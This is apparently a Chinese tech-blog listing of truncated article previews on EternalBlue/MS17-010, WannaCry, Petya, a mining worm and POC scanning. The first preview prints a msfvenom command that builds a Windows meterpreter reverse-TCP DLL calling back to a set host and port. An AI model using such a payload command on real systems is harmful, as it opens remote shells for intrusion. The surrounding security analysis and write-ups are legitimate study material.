一、环境搭建: 二、攻击流程: 攻击流程图解: 1.在kali linux中利用metasploit生成用于建立反向链接的dll文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.245 LPORT=4444 -f dll > ...
分类:
其他好文 时间:
2017-08-12 21:24:43
阅读次数:
177
说到邮箱文件被黑,或者被所谓的"黑客'盗取账号,都会让人感觉不是很自在,最后的结果就是邮箱文件资料全部都被泄露,不管是工作上的资料还是私人隐私全部被曝光,最近贝克汉姆的邮件也被泄露啦,不得不说,此次邮件门事件,不管是南半球还是北半球的你我,都知道了,而且作为一直都树立良好形象的球星来说,不管是经济还 ...
分类:
其他好文 时间:
2017-08-08 17:54:57
阅读次数:
203
背景介绍 近日,渔村安全团队追踪到一个利用永恒之蓝漏洞传播的挖矿程序,其具备高度的模块化和较强的传播能力,在短短数日就感染了数万台用户电脑。针对该突发情况,渔村安全团队迅速组织应急工作,最终使得目前的感染情况受到控制,下文为样本分析。 感染量 从微软发布ms17-010(永恒之蓝漏洞) 的修复补丁到 ...
分类:
其他好文 时间:
2017-07-28 09:45:21
阅读次数:
1393
0x01 漏洞原理:http://blogs.360.cn/blog/nsa-eternalblue-smb/ 目前已知受影响的 Windows 版本包括但不限于:Windows NT,Windows 2000、Windows XP、Windows 2003、Windows Vista、Window ...
分类:
其他好文 时间:
2017-07-24 09:54:29
阅读次数:
220
一、前言 5月12日,一场全球性互联网灾难悄然而至,一款名为WannaCRY的PC端恶意勒索软件利用NSA泄漏的危险漏洞“永恒之蓝”,给100多个国家和地区10万台电脑造成了巨大的损失。到2017年为止,全球手机用户总量已经突破50亿,而作为占比超过50%的android系统中,同样有许许多多类似W ...
分类:
移动开发 时间:
2017-07-05 17:35:44
阅读次数:
300
中毒现象 Petya(彼佳) 病不针对文件进行加密,病会修改系统的MBR引导扇区,重启电脑后加密整个磁盘。 Wannacry(永恒之蓝) 用户中毒之后病会加密指定类型文件(文件类型包含上百种),然后设置桌面背景,弹出窗口显示付款账号与勒索信息,攻击者声称用户需要支付300~600美元的比特币才可以解 ...
分类:
其他好文 时间:
2017-07-02 20:32:26
阅读次数:
299
一种是调用Nsa泄露的smbtouch-1.1.1.exe,另一种是参考巡风的poc 1 前两天看到freebuf的关于《如何转换永恒之蓝(Eternalblue)的POC》 ms17-010 poc 扫描这里使用IPy模块处理输入扫描网段和使用multiprocessing机制 ...
分类:
其他好文 时间:
2017-06-09 11:15:19
阅读次数:
1764
1 概述 WannaCry(又叫Wanna Decryptor),一种“蠕虫式”的勒索病毒软件,大小3.3MB,由不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播。该恶意软件会扫描电脑上的TCP 445 ...
分类:
其他好文 时间:
2017-05-20 00:02:38
阅读次数:
430
1 概述 WannaCry(又叫Wanna Decryptor),一种“蠕虫式”的勒索病毒软件,大小3.3MB,由不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播。该恶意软件会扫描电脑上的TCP 445 ...
分类:
其他好文 时间:
2017-05-19 22:28:04
阅读次数:
405
这里用到的:系统:server2008R2服务:AD域WSUSvmwar虚拟化(可有可无,不影响整个环境)具体步骤去我上传的文件下载:
分类:
其他好文 时间:
2017-05-19 14:33:57
阅读次数:
152
